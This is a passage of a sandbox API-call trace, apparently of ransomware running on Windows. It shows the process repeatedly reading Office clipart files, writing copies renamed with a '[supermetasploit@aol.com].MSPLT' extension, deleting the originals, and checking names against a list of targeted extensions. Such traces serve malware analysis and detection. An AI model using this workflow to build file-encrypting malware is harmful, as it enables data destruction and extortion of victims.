(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0292.319] GetLastError () returned 0x0 [0292.319] ReadFile (in: hFile=0x454, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x728, lpOverlapped=0x0) returned 1 [0292.321] WriteFile (in: hFile=0x3d0, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x730, lpOverlapped=0x0) returned 1 [0292.323] ReadFile (in: hFile=0x454, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.323] WriteFile (in: hFile=0x3d0, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0292.323] SetEndOfFile (hFile=0x3d0) returned 1 [0292.323] CloseHandle (hObject=0x3d0) returned 1 [0292.329] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.329] SetEndOfFile (hFile=0x454) returned 1 [0292.539] CloseHandle (hObject=0x454) returned 1 [0292.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0292.540] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf")) returned 1 [0292.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.541] lstrlenW (lpString=".doc") returned 4 [0292.541] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.541] lstrlenW (lpString=".docx") returned 5 [0292.541] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.541] lstrlenW (lpString=".pdf") returned 4 [0292.541] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.541] lstrlenW (lpString=".xls") returned 4 [0292.541] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.541] lstrlenW (lpString=".xlsx") returned 5 [0292.541] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.541] lstrlenW (lpString=".ppt") returned 4 [0292.541] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.541] lstrlenW (lpString=".zip") returned 4 [0292.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.541] lstrlenW (lpString=".rar") returned 4 [0292.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.541] lstrlenW (lpString=".bz2") returned 4 [0292.541] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.541] lstrlenW (lpString=".7z") returned 3 [0292.541] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.541] lstrlenW (lpString=".dbf") returned 4 [0292.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.542] lstrlenW (lpString=".1cd") returned 4 [0292.542] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.542] lstrlenW (lpString=".jpg") returned 4 [0292.542] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.542] lstrlenW (lpString=".doc") returned 4 [0292.542] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.542] lstrlenW (lpString=".docx") returned 5 [0292.542] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.542] lstrlenW (lpString=".pdf") returned 4 [0292.542] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.542] lstrlenW (lpString=".xls") returned 4 [0292.542] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.542] lstrlenW (lpString=".xlsx") returned 5 [0292.542] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.542] lstrlenW (lpString=".ppt") returned 4 [0292.542] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.542] lstrlenW (lpString=".zip") returned 4 [0292.543] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.543] lstrlenW (lpString=".rar") returned 4 [0292.543] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.543] lstrlenW (lpString=".bz2") returned 4 [0292.543] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.543] lstrlenW (lpString=".7z") returned 3 [0292.543] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.543] lstrlenW (lpString=".dbf") returned 4 [0292.543] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.543] lstrlenW (lpString=".1cd") returned 4 [0292.543] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0292.543] lstrlenW (lpString=".jpg") returned 4 [0292.543] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.543] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0292.543] lstrlenW (lpString="AN01184_.WMF") returned 12 [0292.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0292.544] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=3746) returned 1 [0292.544] CloseHandle (hObject=0x454) returned 1 [0292.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf")) returned 0x220 [0292.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0292.545] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.545] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0292.546] GetLastError () returned 0x0 [0292.546] ReadFile (in: hFile=0x454, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xea2, lpOverlapped=0x0) returned 1 [0292.666] WriteFile (in: hFile=0x470, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xeb0, lpOverlapped=0x0) returned 1 [0292.667] ReadFile (in: hFile=0x454, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.667] WriteFile (in: hFile=0x470, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0292.668] SetEndOfFile (hFile=0x470) returned 1 [0292.668] CloseHandle (hObject=0x470) returned 1 [0292.672] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.672] SetEndOfFile (hFile=0x454) returned 1 [0293.441] CloseHandle (hObject=0x454) returned 1 [0293.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0293.490] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf")) returned 1 [0293.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.492] lstrlenW (lpString=".doc") returned 4 [0293.492] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.492] lstrlenW (lpString=".docx") returned 5 [0293.492] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.492] lstrlenW (lpString=".pdf") returned 4 [0293.492] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.492] lstrlenW (lpString=".xls") returned 4 [0293.492] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.492] lstrlenW (lpString=".xlsx") returned 5 [0293.492] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.492] lstrlenW (lpString=".ppt") returned 4 [0293.492] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.492] lstrlenW (lpString=".zip") returned 4 [0293.492] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.492] lstrlenW (lpString=".rar") returned 4 [0293.492] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.492] lstrlenW (lpString=".bz2") returned 4 [0293.492] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.492] lstrlenW (lpString=".7z") returned 3 [0293.492] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.492] lstrlenW (lpString=".dbf") returned 4 [0293.492] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.492] lstrlenW (lpString=".1cd") returned 4 [0293.492] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.493] lstrlenW (lpString=".jpg") returned 4 [0293.493] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.499] lstrlenW (lpString=".doc") returned 4 [0293.499] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.499] lstrlenW (lpString=".docx") returned 5 [0293.499] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.499] lstrlenW (lpString=".pdf") returned 4 [0293.499] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.499] lstrlenW (lpString=".xls") returned 4 [0293.499] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.499] lstrlenW (lpString=".xlsx") returned 5 [0293.499] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.499] lstrlenW (lpString=".ppt") returned 4 [0293.499] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.499] lstrlenW (lpString=".zip") returned 4 [0293.499] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.499] lstrlenW (lpString=".rar") returned 4 [0293.499] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.499] lstrlenW (lpString=".bz2") returned 4 [0293.499] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.500] lstrlenW (lpString=".7z") returned 3 [0293.500] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.500] lstrlenW (lpString=".dbf") returned 4 [0293.500] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.500] lstrlenW (lpString=".1cd") returned 4 [0293.500] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0293.500] lstrlenW (lpString=".jpg") returned 4 [0293.500] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.500] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0293.500] lstrlenW (lpString="AN02724_.WMF") returned 12 [0293.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0293.501] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2108) returned 1 [0293.501] CloseHandle (hObject=0x440) returned 1 [0293.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf")) returned 0x220 [0293.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0293.502] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.502] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0293.503] GetLastError () returned 0x0 [0293.503] ReadFile (in: hFile=0x440, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x83c, lpOverlapped=0x0) returned 1 [0293.624] WriteFile (in: hFile=0x470, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x840, lpOverlapped=0x0) returned 1 [0293.630] ReadFile (in: hFile=0x440, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0293.630] WriteFile (in: hFile=0x470, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0293.630] SetEndOfFile (hFile=0x470) returned 1 [0293.866] CloseHandle (hObject=0x470) returned 1 [0294.033] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.033] SetEndOfFile (hFile=0x440) returned 1 [0294.114] CloseHandle (hObject=0x440) returned 1 [0294.115] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.115] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf")) returned 1 [0294.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.116] lstrlenW (lpString=".doc") returned 4 [0294.116] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.116] lstrlenW (lpString=".docx") returned 5 [0294.116] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.116] lstrlenW (lpString=".pdf") returned 4 [0294.116] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.116] lstrlenW (lpString=".xls") returned 4 [0294.116] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.116] lstrlenW (lpString=".xlsx") returned 5 [0294.116] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.116] lstrlenW (lpString=".ppt") returned 4 [0294.116] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.117] lstrlenW (lpString=".zip") returned 4 [0294.117] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.117] lstrlenW (lpString=".rar") returned 4 [0294.117] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.117] lstrlenW (lpString=".bz2") returned 4 [0294.117] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.117] lstrlenW (lpString=".7z") returned 3 [0294.117] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.117] lstrlenW (lpString=".dbf") returned 4 [0294.117] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.117] lstrlenW (lpString=".1cd") returned 4 [0294.117] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.117] lstrlenW (lpString=".jpg") returned 4 [0294.117] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.117] lstrlenW (lpString=".doc") returned 4 [0294.117] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.117] lstrlenW (lpString=".docx") returned 5 [0294.117] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.118] lstrlenW (lpString=".pdf") returned 4 [0294.118] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.118] lstrlenW (lpString=".xls") returned 4 [0294.118] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.118] lstrlenW (lpString=".xlsx") returned 5 [0294.118] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.118] lstrlenW (lpString=".ppt") returned 4 [0294.118] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.118] lstrlenW (lpString=".zip") returned 4 [0294.118] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.118] lstrlenW (lpString=".rar") returned 4 [0294.118] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.118] lstrlenW (lpString=".bz2") returned 4 [0294.118] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.118] lstrlenW (lpString=".7z") returned 3 [0294.118] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.118] lstrlenW (lpString=".dbf") returned 4 [0294.118] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.118] lstrlenW (lpString=".1cd") returned 4 [0294.118] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0294.118] lstrlenW (lpString=".jpg") returned 4 [0294.118] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.119] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.119] lstrlenW (lpString="AN04191_.WMF") returned 12 [0294.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0294.119] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=6636) returned 1 [0294.119] CloseHandle (hObject=0x440) returned 1 [0294.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf")) returned 0x220 [0294.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0294.120] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.120] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 